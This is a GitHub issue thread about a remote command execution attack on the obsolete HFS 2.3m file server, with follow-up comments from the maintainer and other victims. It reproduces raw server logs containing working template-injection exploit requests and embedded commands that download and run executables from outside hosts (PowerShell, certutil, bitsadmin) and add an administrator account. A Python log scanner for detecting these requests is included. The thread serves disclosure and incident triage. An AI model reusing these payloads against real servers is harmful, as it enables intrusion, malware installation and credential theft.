rejetto / hfs2

web based file server
https://rejetto.com/hfs
GNU General Public License v3.0

HFS 2.3.m Hack - Remote Command Execution #44

Open Ptit-Philou opened 3 months ago

Ptit-Philou commented 3 months ago

My HFS file server (W10) has just been hacked: it's time to update, don't use old versions anymore!

This is some information for administrators. The hack looks like this one: https://github.com/rapid7/metasploit-framework/pull/19240 (not https://www.exploit-db.com/exploits/49584 )

I noticed strange commands in the HFS logs that look like remote commands in the Search box.

HFS logs:

09/06/2024 11:20:44 146.70.200.117 44116 Connected
09/06/2024 11:20:44 146.70.200.117 44116 Requested GET /?n=> &cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESUTLT:{.?n.}{.^abc.}===={.?n.}
09/06/2024 18:14:17 164.90.160.59 59642 Requested GET /?n=> &cmd=nslookup+cpit4a9no3sf3j5nia3gjkq7s6mq4anoy.oast.online&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 08:06:56 165.227.68.140 60692 Connected
11/06/2024 08:06:56 165.227.68.140 60692 Requested GET /?n=> &cmd=cmd+/c+echo 505227774 > C:/Users/Public/Downloads/0&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}
11/06/2024 08:06:58 165.227.68.140 60694 Connected
11/06/2024 08:07:11 165.227.68.140 60694 Requested GET /?n=> &cmd=cmd+/c+powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://dpp-s3-data.s3.amazonaws.com/tpPNDWqMh5ubw','C:/Users/Public/Downloads/1.exe')&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}----------------------start{.^abc.}----------------------end{.?n.}

11/06/2024 16:46:20 104.28.158.204 62279 Requested GET /?n=> &cmd=RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:46:20 104.28.153.15 14204 Requested GET /?n=> &cmd=certutil+-urlcache+-split+-f+http://39.101.122.168:889/RR.exe&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 16:51:02 61.52.169.128 59799 Requested GET /?n=> &cmd=ipconfig&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:49:18 103.119.15.175 47684 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:49:18 103.119.15.175 47690 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//85.209.133.45%3A7598/dong.exe%27%29%29%22%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:53:25 43.205.207.16 60144 Requested GET /?n=> &cmd=ipconfig+/all&search=%xxx%url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 17:55:36 103.119.15.175 52008 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 17:55:36 103.119.15.175 52010 Requested GET /?n=%0A&cmd=bitsadmin.exe%20/transfer%20%22DownloadFile%22%20http%3A//85.209.133.45%3A7598/dong.exe%20%22%25CD%25%5Cdong.exe%22%20%26%26%20dong.exe&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 18:28:56 103.119.15.175 56406 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 18:28:56 103.119.15.175 56414 Requested GET /?n=%0A&cmd=powershell.exe%20-nop%20-w%20hidden%20-c%20%22IEX%28%28new-object%20net.webclient%29.downloadstring%28%27http%3A//120.131.13.101%3A8080/index.php%27%29%29%22&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:37:49 103.119.15.175 47594 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:37:49 103.119.15.175 47606 Requested GET /?n=%0A&cmd=net%20localgroup%20Administrators%20wlccwlc%20/add&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

11/06/2024 20:47:31 103.119.15.175 39702 Requested GET /?n=%0A&cmd=REG%20query%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%20Server%5CWinStations%5CRDP-Tcp%20/v%20PortNumber&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 20:57:17 103.119.15.175 34474 Connected
11/06/2024 20:57:17 103.119.15.175 34474 Requested GET /?n=%0A&cmd=echo%20WanLiChangChengWanLiChang%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Crash.exe+-OutFile+c:\users\public\Crash.exe&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:15:49 3.38.212.132 52953 Requested GET /?n=>&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/WindowsWatcher.key+-OutFile+c:\users\public\WindowsWatcher.key&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
11/06/2024 23:16:04 3.38.212.132 52955 Requested GET /?n=>&cmd=powershell+Invoke-WebRequest+http://185.173.93.167:13306/Roboform.dll+-OutFile+c:\users\public\Roboform.dll&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
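The entries above are plain text, so an administrator can triage an HFS 2.x log offline. As an added example (not code from this issue or from HFS), here is a small Python scanner that parses the "Requested" entries, decodes the query string and flags requests whose parameters carry `{.exec ...}` template macros, reporting the `cmd` value they would have run. The sample log inside it is constructed and uses TEST-NET addresses.

```python
"""Scan HFS 2.x request logs for template-macro injection in query parameters."""
import re
from urllib.parse import parse_qs

# One HFS 2.x log entry: "DD/MM/YYYY HH:MM:SS <client-ip> <port> Requested <METHOD> <target>"
REQUEST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (?P<ip>\S+) (?P<port>\d+) "
    r"Requested (?P<method>[A-Z]+) (?P<target>.+)$"
)
# HFS template macros look like {.name|arg|arg.}; {.exec ...} runs a command and
# {.?cmd.} reads the "cmd" query parameter, which is what the logged attacks chain.
MACRO_RE = re.compile(r"\{\.\s*([?^]?[A-Za-z]+)")

def parse_request(line):
    """Fields of a 'Requested' entry, or None for 'Connected' and other lines."""
    m = REQUEST_RE.match(line.strip())
    return m.groupdict() if m else None

def find_injection(line):
    """Flag a request whose decoded query parameters contain template macros.

    Returns None for clean requests; otherwise the timestamp, client IP, the distinct
    macro names seen and the decoded 'cmd' value that {.exec|{.?cmd.}...} would run.
    """
    req = parse_request(line)
    if req is None or "?" not in req["target"]:
        return None
    # parse_qs undoes %XX and '+' encoding, so both the raw and the percent-encoded
    # payload variants seen in the logs are inspected in decoded form.
    params = parse_qs(req["target"].split("?", 1)[1], keep_blank_values=True)
    decoded = " ".join(v for values in params.values() for v in values)
    macros = list(dict.fromkeys(MACRO_RE.findall(decoded)))  # dedupe, keep order
    if not macros:
        return None
    return {"ts": req["ts"], "ip": req["ip"], "macros": macros,
            "runs_command": "exec" in macros, "cmd": params.get("cmd", [None])[0]}

def scan_log(text):
    """Run find_injection over every line of a log file and return the hits."""
    return [hit for hit in map(find_injection, text.splitlines()) if hit]

# Constructed sample log (TEST-NET addresses), modelled on the entries in the report.
SAMPLE_LOG = """\
09/06/2024 11:20:44 192.0.2.10 44116 Connected
09/06/2024 11:20:44 192.0.2.10 44116 Requested GET /?n=> &cmd=ipconfig+/all&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.^abc.}{.?n.}
09/06/2024 11:25:03 192.0.2.20 50001 Requested GET /docs/?search=quarterly+report
09/06/2024 11:26:40 192.0.2.30 50002 Requested GET /?n=%0A&cmd=echo%20hello%26&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.^abc.}
"""
```

Running `scan_log` over a real hfs.log gives one hit per injected request, which is enough to pull the client IPs and the commands that were executed for incident triage.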

rejetto commented 3 months ago

that's right. people who didn't disable the automatic check for updates must have got this warning several days ago

as the front page of this repo says, this project is obsolete and i'm not working on it anymore. i cannot exclude that you may find a fix in some fork.

my suggestion is to use HFS 3 https://github.com/rejetto/hfs

Ptit-Philou commented 3 months ago

Thank you for the feedback: updated to HFS 3 :-) Great job ;-)

DRSDavidSoft commented 3 months ago

@Ptit-Philou Great write-up; I wish I had been notified of this attack sooner. According to @mohemiv, this issue was first reported to @rejetto on 18/08/2023 and the PoC was released on 25/05/2024.


Guess what? I was happily running and using HFS 2 on my servers during these dates! A quick check of the Windows Defender logs (also known as Security Essentials) shows that the 1.exe, RR.exe and Crash.exe files were all downloaded on these servers, and only some were detected and blocked by Windows Defender.

That nasty Roboform.dll is in fact a malicious keylogger and clipboard monitor that has been collecting ALL secret tokens, passwords, cookies, etc. on the server for the past couple of weeks. Sheesh! 😭

@mohemiv next time please ALSO LET ME KNOW too. (I'm joking of course), but this is really pissing me off! @rejetto Thank you for the great software. It's my bad for not using HFS 3 instead of HFS 2, but I wish you had implemented a self-destruct for HFS 2 instead of the warning message, or at least made the update disable the template processing/search functionality or something like that.

Now let's all move on to HFS 3, and R.I.P. to HFS 2.

Ptit-Philou commented 3 months ago

Yeah, move to HFS 3, and thank you for the feedback ;-)

rejetto commented 3 months ago

i don't think it's ok to make "self-destructing" software (or similar), but I guess AFTER the damage a lot of people would accept that, when it's too late. The POC i was given at the time was not working on 2.4, so i was not very worried. I discovered the other POC only when it was too late.

Ptit-Philou commented 3 months ago

A strange point: during the hack on my server, hfs.exe was deleted, maybe by the hacker? It helped me to react, as I was unable to share files and I didn't pay attention to the logs... The installer should be removed or modified to tell users that security is compromised.

DRSDavidSoft commented 3 months ago

@Ptit-Philou Sure, it was also the initial reason that I found this out: #43. I also agree that it might have been the attackers themselves that removed HFS, maybe to prevent other attackers from connecting to the same compromised machine. Thank goodness that they did, otherwise I also wouldn't have found it out!